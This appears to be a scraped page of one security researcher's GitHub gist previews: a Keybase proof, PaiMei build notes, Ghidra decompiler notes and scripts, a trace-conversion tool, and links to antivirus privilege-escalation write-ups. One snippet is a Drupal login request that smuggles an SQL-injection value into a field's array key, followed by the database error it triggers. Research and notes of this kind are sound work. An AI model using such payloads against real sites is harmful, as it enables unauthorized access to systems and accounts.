I hereby claim:
- I am v-p-b on github.
- I am buherator (https://keybase.io/buherator) on keybase.
- I have a public key whose fingerprint is 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855
To claim this, I am signing this object:
name[0%20%20oxr%201%3d1%20--%20]=admin&name[0]=admin&pass=S2test&form_build_id=form-sn1hRoa-B1e-GhbPCBRswqRllD0noOdRnJE5iiO53pI&form_id=user_login_block&op=Log+in | |
<li><em class="placeholder">PDOException</em>: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'oxr 1=1 -- , 'admin' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0 oxr 1=1 -- , :name_0 AND status = 1; Array | |
( | |
[:name_0 oxr 1=1 -- ] => admin | |
[:name_0] => admin | |
) |
#!/bin/bash | |
if [ $1 ]; then | |
if [[ $2 && $2 == "done" ]]; then | |
rm ~/_todo/$1; | |
else | |
touch ~/_todo/$1; | |
fi; | |
fi; |
I hereby claim:
To claim this, I am signing this object:
http://code.google.com/p/paimei/ - As of r253 | |
- You need pydasm, it is included in the libdasm package. v1.5 is fine, you don't want to fight with the bugs of the unstable version - http://code.google.com/p/libdasm/ | |
- PyDasm will cry about MSVC scripts but you don't need those. Install MinGW (with C++ support?) - http://www.mingw.org/ | |
- Add MinGw's bin directory to your path or else it won't find gcc | |
- Remove the -mno-cygwin parameters from pythonXX\lib\distutils\cygwinccompiler.py, remove the .pyc to recompile | |
- setup.py build_ext --compiler=mingw32 | |
- setup.py install may fail. Install the lib by copying the .pyd file from the build directory to PythonXX\Lib\site-packages | |
- You don't need PaiMei's dependencies to use PyDbg, just simply build and install with setup.py | |
- Remove the bundled pydasm.pyd from the PaiMei package |
My current target uses a deterministic pattern when calling C++ constructors, so I can use the CFG to identify object instantiation. Here are my notes about how to use Ghidra's decompiler to get the sizes of objects to be created:
We can use the parameter of operator_new()
to find the size of the objects. Instead of parsing the instructions of the relevant basic blocks (and hoping that we don't run into some unexpected instruction sequences generated by the compiler) we can use the decompiler to get the association between the call to operator_new()
and its parameter.
Ghidra/Features/Decompiler/ghidra_scripts/ShowCCallsScript.java
contains a nice example of how to use the Decompiler API. First, an instance of DecompInterface
must be created, as shown in setUpDecompiler()
. Note that this method doesn't call openProgram()
on the returned DecomInterface
object, that is necessary to run decompilation! The decompileFunction()
method works as expected - the returned DecompileResults
object con
Install the CodeQL extension and configure the CLI!
This is not strictly mandatory, but you probably want something like this:
#Stupid little script to find identifiable strings referenced from a function or its descendants | |
#@author buherator | |
#@category Test | |
#@keybinding | |
#@menupath | |
#@toolbar | |
from ghidra.util.task import TaskMonitor | |
from docking.widgets import OptionDialog | |
from ghidra.program.model.symbol import RefType |
import sys | |
import struct | |
""" | |
From debugger trace to Lighthouse | |
================================= | |
Converting debugger trace logs to binary drcov format that is good enough for Lighthouse. |
https://seclists.org/fulldisclosure/2019/Aug/1 | |
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67 | |
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/ | |
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM | |
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM | |
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM | |
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html | |
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968 | |
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6 | |
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html |